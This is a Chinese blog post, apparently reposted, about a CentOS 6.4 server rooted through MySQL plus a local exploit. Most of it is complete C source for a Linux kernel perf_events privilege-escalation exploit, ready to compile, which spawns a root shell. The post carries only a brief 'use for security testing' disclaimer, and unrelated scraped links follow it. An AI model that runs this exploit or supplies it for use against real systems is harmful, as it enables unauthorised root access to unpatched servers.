Centos/CentOS 6.4 linux内核2.6.3.2本地提权exp代码

jincon 发表于 2014-05-31 08:25:00 发表在: 代码审计

最近我接手的一台centos 服务器的,被黑客攻击,直接获取到root权限,牛逼,通过分析,大约是通过

mysql+exp提权获得root权限。下面分享下。

具体大家可以去测试。代码具有非常强的攻击性,请用于安全测试,否则后果自担。

http://www.jincon.com/archives/187/

/** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.*/#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))void fuck() {int i,j,k;uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));uint64_t kbase = ((uint64_t)current)>>36;uint32_t *fixptr = (void*) AB(1);*fixptr = -1;for (i=0; i<4000; i+=4) {uint64_t *p = (void *)&current[i];uint32_t *t = (void*) p[0];if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;for (j=0; j<20; j++) { for (k = 0; k < 8; k++)if (((uint32_t*)uids)[k] != t[j+k]) goto next;for (i = 0; i < 8; i++) t[j+i] = 0;for (i = 0; i < 10; i++) t[j+9+i] = -1;return;
next:;    }}
}void sheep(uint32_t off) {uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };int fd = syscall(298, buf, 0, -1, -1, 0);assert(!close(fd));
}int  main() {uint64_t  u,g,needle, kbase, *p; uint8_t *code;uint32_t *map, j = 5;int i;struct {uint16_t limit;uint64_t addr;} __attribute__((packed)) idt;assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);memset(map, 0, SIZE);sheep(-1); sheep(-2);for (i = 0; i < SIZE/4; i++) if (map[i]) {assert(map[i+1]);break;}assert(i<SIZE/4);asm ("sidt %0" : "=m" (idt));kbase = idt.addr & 0xff000000;u = getuid(); g = getgid();assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);setresuid(u,u,u); setresgid(g,g,g);while (j--) {needle = AB(j+1);assert(p = memmem(code, 1024, &needle, 8));if (!p) continue;*p = j?((g<<32)|u):(idt.addr + 0x48);}sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);asm("int $0x4");  assert(!setuid(0));return execl("/bin/bash", "-sh", NULL);
}

转载于:https://www.cnblogs.com/archoncap/p/4448210.html

LInux 安全测试 2相关推荐

  1. linux下测试磁盘的读写IO速度-简易方法

    linux下测试磁盘的读写IO速度-简易方法 参考资料: https://blog.csdn.net/zqtsx/article/details/25487185 一:使用hdparm命令 这是一个是 ...

  2. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  3. Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap

    Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap 网络扫描和嗅探工具--Nmap Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具.该工具可以扫描 ...

  4. Kail Linux渗透测试教程之Recon-NG框架

    Kail Linux渗透测试教程之Recon-NG框架 信息收集 信息收集是网络攻击最重要的阶段之一.要想进行渗透攻击,就需要收集目标的各类信息.收集到的信息越多,攻击成功的概率也就越大.本章将介绍信 ...

  5. 基于Android设备的Kali Linux渗透测试教程第1章渗透测试

    基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...

  6. Kail Linux渗透测试实训手册第3章信息收集

    Kail Linux渗透测试实训手册第3章信息收集 信息收集是网络攻击最重要的阶段之一.要想进行渗透攻击,就需要收集目标的各类信息.收集到的信息越多,攻击成功的概率也就越大.本章将介绍信息收集的相关工 ...

  7. 《Kali Linux渗透测试的艺术》—8章8.7节本章总结

    本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的8章8.7节本章总结,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shakeel A ...

  8. linux渗透测试_渗透测试:选择正确的(Linux)工具栈来修复损坏的IT安全性

    linux渗透测试 Got IT infrastructure? Do you know how secure it is? The answer will probably hurt, but th ...

  9. 《Kali Linux渗透测试的艺术》—第2章2.3节安全测试方法论

    本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的第2章2.3节安全测试方法论,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shake ...

  10. Kali Linux渗透测试 073 扫描工具-Vega

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 vega 简介 使用基本流程 扫描的基本使用 使用截 ...

最新文章

  1. b树与b+树的区别_一篇文章理清B树、B-树、B+树、B*树索引之间的区别与联系
  2. LeetCode Add and Search Word - Data structure design(字典树)
  3. 人体姿态估计 自顶向下与自底向上
  4. python求n项多项式的和_Python:创建n次多项式
  5. c语言程序设计B试题,c语言程序设计期末试题B(含答案)Word版
  6. python --- 使用socket创建tcp服务
  7. springboot + mybatis + gradle项目构建过程
  8. 控制台编写JAVA程序教程_写一个java程序的步骤是什么?写java程序技巧
  9. 面试官:大型系统架构设计细节你知道多少??
  10. Android AES加密算法及事实上现
  11. 2019年-vSphere 7之ESXi 7.0 RC部署指南(转载)
  12. 重庆理工大学图像处理实验二:图像增强
  13. 对MAC自带的SVN进行升级
  14. pandas不显示index_Pandas中文官档 ~ 基础用法1
  15. [在职软件工程]面向对象的分析与设计
  16. QT重装系统后的程序异常处理与Windows奔溃导致无法开机的资料备份
  17. 深入浅出理解 Java回调机制(异步)
  18. python turtle库seth_python学习篇,turtle库
  19. 2009年度优科豪马轮胎全国经销商会议在三亚召开
  20. 台式电脑怎么组装步骤_台式电脑组装教程图解,手把手教您组装(零基础也能搞定)...

热门文章

  1. 哪个网站是计算机知识的,电脑知识网站
  2. sublime开发python需要安装哪些插件_Sublime text 3搭建Python开发环境及常用插件安装...
  3. java中sql去除游标_java.sql.SQLException:-ORA-01000:已超过最大打开游标
  4. html 二级菜单延迟消失,如果让子菜单延迟消失?
  5. php5.0 aes加解密,PHP的aes加解密算法
  6. 陕西省铜川市计算机学校,铜川市计算机专业学校怎么样?好不好?
  7. python提取txt中指定内容_提取视频中的音频——python三行程序搞定!
  8. k8s多master建议用几个_K8s 还是 k3s?This is a question
  9. java 汉字排序_java实现中文汉字的首字母排序
  10. Pytorch教程(十三):reshape、squeeze、flatten